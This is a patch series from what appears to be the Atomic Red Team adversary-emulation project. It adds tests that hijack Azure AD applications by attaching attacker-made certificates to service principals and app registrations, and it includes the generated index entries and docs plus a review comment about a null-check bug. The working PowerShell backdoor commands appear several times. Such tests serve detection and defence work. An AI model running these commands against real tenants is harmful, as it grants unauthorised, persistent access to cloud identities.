be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AzureAD) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + +
From 2411b3600817f579c7fcd8075b2a8b7d78f2760b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?=
Date: Thu, 8 Jul 2021 19:23:05 +0200
Subject: [PATCH 04/19] T1098.001: implement AAD application hijacking tests (#1454)
* T1098.001: implement AAD application hijacking tests Create Azure AD Application Hijacking Tests
* T1098.001 : add end of test string
* T1098.001: use new "azure-ad" platform
* T1098.001: use new "azure-ad" platform
* Update T1098.001.yaml
* Update T1098.001.yaml
* Update T1098.001.yaml
Co-authored-by: piaconsigny <49986009+piaconsigny@users.noreply.github.com>
---
 atomics/T1098.001/T1098.001.yaml | 170 ++++++++++++++++++++++++++++++-
 1 file changed, 169 insertions(+), 1 deletion(-)
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index 6435b055..4c349f97 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -1,6 +1,171 @@ attack_technique: T1098.001 display_name: 'Account Manipulation: Additional Cloud Credentials' atomic_tests: +- name: Azure AD Application Hijacking - Service Principal + auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406 + description: | + Add a certificate to an Application through its Service Principal. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + service_principal_name: + description: Name of the targeted service principal + type: String + default: SuperSP + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: $env:TEMP + dependency_executor_name: powershell + dependencies: + - description: | + AzureAD module must be installed. + prereq_command: | + if (Get-Module AzureAD) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" + if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } + # in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + + cleanup_command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" + $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId + foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId + } + } + Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item + rm "#{path_to_cert}\#{service_principal_name}.pfx" + + name: powershell + elevation_required: false + +- name: Azure AD Application Hijacking - App Registration + auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a + description: | + Add a certificate to an Application through its App Registration. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. 
+ supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + application_name: + description: Name of the targeted application + type: String + default: SuperApp + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: $env:TEMP + dependency_executor_name: powershell + dependencies: + - description: | + AzureAD module must be installed. + prereq_command: | + if (Get-Module AzureAD) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $app = Get-AzureADApplication -Searchstring "#{application_name}" + if ($app -eq $null) { Write-Warning "Application not found"; exit } + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + 
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + + cleanup_command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $app = Get-AzureADApplication -Searchstring "#{application_name}" + $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId + foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId + } + } + Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item + rm "#{path_to_cert}\#{application_name}.pfx" + + name: powershell + elevation_required: false + - name: AWS - Create Access Key and Secret Key auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 description: | @@ -28,4 +193,7 @@ atomic_tests: access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` aws iam delete-access-key --access-key-id $access_key --user-name #{username} rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds - name: sh \ No newline at end of file + name: sh + + + From 6c2c28f497fc21ef0d5ad1cf6bd74518bc54c14e Mon Sep 17 00:00:00 2001 
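Review bot: The guard `if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }` only covers the no-match case; when `Get-AzureADServicePrincipal -SearchString` returns several objects, `-eq $null` acts as a filter on the array and yields an empty (falsy) array, so the script carries on with `$sp.ObjectId` expanding to more than one id. As far as I recall `-SearchString` is a prefix match on the display name, so a tenant that also holds a `SuperSP-test` principal would trigger this. Putting `$null` on the left and rejecting ambiguity avoids it: `if ($null -eq $sp) { Write-Warning "Service Principal not found"; exit }` followed by `if (@($sp).Count -gt 1) { Write-Warning "Several service principals match #{service_principal_name}, refine the name"; exit }`. The same applies to `$app` in the App Registration test, and both cleanup_command blocks dereference `$sp.ObjectId` / `$app.ObjectId` with no null check at all. Separately, `$pwd` shadows PowerShell's automatic `$PWD` variable inside the command; a name such as `$certPwd` is clearer.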
From: CircleCI Atomic Red Team GUID generator Date: Thu, 8 Jul 2021 17:23:32 +0000 Subject: [PATCH 05/19] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6a2b05f5..1b4d0b87 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -729,3 +729,5 @@ b4988cad-6ed2-434d-ace5-ea2670782129 a8aa2d3e-1c52-4016-bc73-0f8854cfa80a c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 5a51ef57-299e-4d62-8e11-2d440df55e69 +b8e747c3-bdf7-4d71-bce2-f1df2a057406 +a12b5531-acab-4618-a470-0dafb294a87a From b51f415e30c671c7422a621a814ec2f7cc3b9790 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 8 Jul 2021 17:23:38 +0000 Subject: [PATCH 06/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 4 +- atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- atomics/Indexes/index.yaml | 153 ++++++++++++++ atomics/T1098.001/T1098.001.md | 189 +++++++++++++++++- 6 files changed, 352 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d5a392a7..ea2dfdec 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -495,7 +495,9 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh -persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh +persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell +persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell +persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 61ce7560..d25c3572 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -154,7 +154,9 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh -persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh +persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell +persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell +persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index debc08d8..8b4533db 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -854,7 +854,9 @@ - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) - - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws] + - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad] + - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad] + - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 4517c9e3..678b201a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -413,7 +413,9 @@ - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) - - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws] + - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad] + - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad] + - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws] - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c3270f93..2096530e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -37157,6 +37157,159 @@ persistence: - Azure AD identifier: T1098.001 atomic_tests: + - name: Azure AD Application Hijacking - Service Principal + auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406 + description: | + Add a certificate to an Application through its Service Principal. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + service_principal_name: + description: Name of the targeted service principal + type: String + default: SuperSP + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: "$env:TEMP" + dependency_executor_name: powershell + dependencies: + - description: 'AzureAD module must be installed. + +' + prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" + if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } + # in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString + -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName + System.Management.Automation.PSCredential -ArgumentList \"#{username}\", + $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal + -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential + -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) + -eq \"AtomicTest\") {\n Remove-AzureADServicePrincipalKeyCredential -ObjectId + $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n" + name: powershell + elevation_required: false + - name: Azure AD Application Hijacking - App Registration + auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a + description: | + Add a certificate to an Application through its App Registration. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. 
+ supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + application_name: + description: Name of the targeted application + type: String + default: SuperApp + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: "$env:TEMP" + dependency_executor_name: powershell + dependencies: + - description: 'AzureAD module must be installed. + +' + prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $app = Get-AzureADApplication -Searchstring "#{application_name}" + if ($app -eq $null) { Write-Warning "Application not found"; exit } + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + 
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString + -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName + System.Management.Automation.PSCredential -ArgumentList \"#{username}\", + $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication + -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential + -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) + -eq \"AtomicTest\") {\n Remove-AzureADApplicationKeyCredential -ObjectId + $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n" + name: powershell + elevation_required: false - name: AWS - Create Access Key and Secret Key auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 description: 'Adversaries create their own new access and secret keys to programatically diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md index c7e59069..94e5dd99 100644 --- a/atomics/T1098.001/T1098.001.md +++ b/atomics/T1098.001/T1098.001.md 
@@ -8,12 +8,197 @@ In infrastructure-as-a-service (IaaS) environments, after gaining access through ## Atomic Tests -- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key) +- [Atomic Test #1 - Azure AD Application Hijacking - Service Principal](#atomic-test-1---azure-ad-application-hijacking---service-principal) + +- [Atomic Test #2 - Azure AD Application Hijacking - App Registration](#atomic-test-2---azure-ad-application-hijacking---app-registration) + +- [Atomic Test #3 - AWS - Create Access Key and Secret Key](#atomic-test-3---aws---create-access-key-and-secret-key)
-## Atomic Test #1 - AWS - Create Access Key and Secret Key +## Atomic Test #1 - Azure AD Application Hijacking - Service Principal +Add a certificate to an Application through its Service Principal. +The certificate can then be used to authenticate as the application and benefit from its rights. +An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** b8e747c3-bdf7-4d71-bce2-f1df2a057406 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| service_principal_name | Name of the targeted service principal | String | SuperSP| +| certificate_password | Password of the new certificate | string | Passw0rd| +| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" +if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } +# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long +$certNotAfter = (Get-Date).AddDays(2) +$credNotAfter = (Get-Date).AddDays(1) +$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint +$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText +Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd + +$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) +$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + +New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + +Start-Sleep -s 30 +$tenant=Get-AzureADTenantDetail +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb +Write-Host "Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" +Write-Host "End of Hijacking" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" +$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId +foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId + } +} +Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item +rm "#{path_to_cert}\#{service_principal_name}.pfx" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AzureAD) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
+
+ +## Atomic Test #2 - Azure AD Application Hijacking - App Registration +Add a certificate to an Application through its App Registration. +The certificate can then be used to authenticate as the application and benefit from its rights. +An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** a12b5531-acab-4618-a470-0dafb294a87a + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| application_name | Name of the targeted application | String | SuperApp| +| certificate_password | Password of the new certificate | string | Passw0rd| +| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$app = Get-AzureADApplication -Searchstring "#{application_name}" +if ($app -eq $null) { Write-Warning "Application not found"; exit } +$certNotAfter = (Get-Date).AddDays(2) +$credNotAfter = (Get-Date).AddDays(1) +$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint +$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText +Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd + +$cert = New-Object 